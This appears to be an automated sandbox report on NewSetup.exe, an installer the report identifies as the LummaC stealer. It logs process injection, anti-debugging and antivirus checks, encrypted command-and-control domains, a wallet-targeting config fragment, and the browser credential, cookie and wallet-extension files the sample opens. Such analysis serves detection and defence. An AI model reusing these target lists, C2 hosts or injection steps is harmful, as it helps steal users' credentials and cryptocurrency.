              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
              Source: C:\Users\user\Desktop\NewSetup.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 0_2_0021F8E9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0021F8E9
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 0_2_0024A19E mov edi, dword ptr fs:[00000030h]0_2_0024A19E
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 0_2_00211FB0 mov edi, dword ptr fs:[00000030h]0_2_00211FB0
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 3_2_00211FB0 mov edi, dword ptr fs:[00000030h]3_2_00211FB0
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 0_2_0022D8E0 GetProcessHeap,0_2_0022D8E0
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 0_2_0021F52D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0021F52D
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 0_2_0021F8E9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0021F8E9
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 0_2_0021F8DD SetUnhandledExceptionFilter,0_2_0021F8DD
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 0_2_00227E30 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00227E30
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 3_2_0021F52D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0021F52D
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 3_2_0021F8E9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0021F8E9
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 3_2_0021F8DD SetUnhandledExceptionFilter,3_2_0021F8DD
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 3_2_00227E30 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00227E30

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Contains functionality to inject code into remote processes
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 0_2_0024A19E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_0024A19E
              Injects a PE file into a foreign processes
              Source: C:\Users\user\Desktop\NewSetup.exeMemory written: C:\Users\user\Desktop\NewSetup.exe base: 400000 value starts with: 4D5AJump to behavior
              LummaC encrypted strings found
              Source: NewSetup.exe, 00000000.00000002.2121450452.0000000004A9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: hummskitnj.buzz
              Source: NewSetup.exe, 00000000.00000002.2121450452.0000000004A9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: cashfuzysao.buzz
              Source: NewSetup.exe, 00000000.00000002.2121450452.0000000004A9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: appliacnesot.buzz
              Source: NewSetup.exe, 00000000.00000002.2121450452.0000000004A9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: screwamusresz.buzz
              Source: NewSetup.exe, 00000000.00000002.2121450452.0000000004A9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: inherineau.buzz
              Source: NewSetup.exe, 00000000.00000002.2121450452.0000000004A9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: scentniej.buzz
              Source: NewSetup.exe, 00000000.00000002.2121450452.0000000004A9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: rebuildeso.buzz
              Source: NewSetup.exe, 00000000.00000002.2121450452.0000000004A9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: prisonyfork.buzz
              Source: NewSetup.exe, 00000000.00000002.2121450452.0000000004A9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: stingyerasjhru.click
              Source: C:\Users\user\Desktop\NewSetup.exeProcess created: C:\Users\user\Desktop\NewSetup.exe "C:\Users\user\Desktop\NewSetup.exe"Jump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: EnumSystemLocalesW,0_2_0022D1BD
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00231287
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: EnumSystemLocalesW,0_2_002314D8
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00231580
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: EnumSystemLocalesW,0_2_002317D3
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: GetLocaleInfoW,0_2_00231840
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: EnumSystemLocalesW,0_2_00231915
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: GetLocaleInfoW,0_2_00231960
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00231A07
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: GetLocaleInfoW,0_2_00231B0D
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: GetLocaleInfoW,0_2_0022CC15
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: EnumSystemLocalesW,3_2_0022D1BD
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_00231287
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: EnumSystemLocalesW,3_2_002314D8
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,3_2_00231580
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: EnumSystemLocalesW,3_2_002317D3
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: GetLocaleInfoW,3_2_00231840
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: EnumSystemLocalesW,3_2_00231915
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: GetLocaleInfoW,3_2_00231960
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_00231A07
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: GetLocaleInfoW,3_2_00231B0D
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: GetLocaleInfoW,3_2_0022CC15
              Source: C:\Users\user\Desktop\NewSetup.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeCode function: 0_2_002200B4 GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,GetSystemTimeAsFileTime,0_2_002200B4
              Source: C:\Users\user\Desktop\NewSetup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: NewSetup.exe, NewSetup.exe, 00000003.00000003.2275542472.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000002.2322348607.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2318084383.00000000033E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\NewSetup.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: NewSetup.exe PID: 5680, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: NewSetup.exeString found in binary or memory: Electrum-LTC
              Source: NewSetup.exeString found in binary or memory: Wallets/ElectronCash
              Source: NewSetup.exeString found in binary or memory: "app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"
              Source: NewSetup.exeString found in binary or memory: "app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"
              Source: NewSetup.exe, 00000003.00000003.2243277695.00000000033F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: NewSetup.exeString found in binary or memory: ExodusWeb3
              Source: NewSetup.exeString found in binary or memory: %appdata%\Ethereum
              Source: NewSetup.exe, 00000003.00000003.2243462732.000000000342F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: NewSetup.exe, 00000003.00000003.2243277695.00000000033F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 0}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"]
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\NewSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
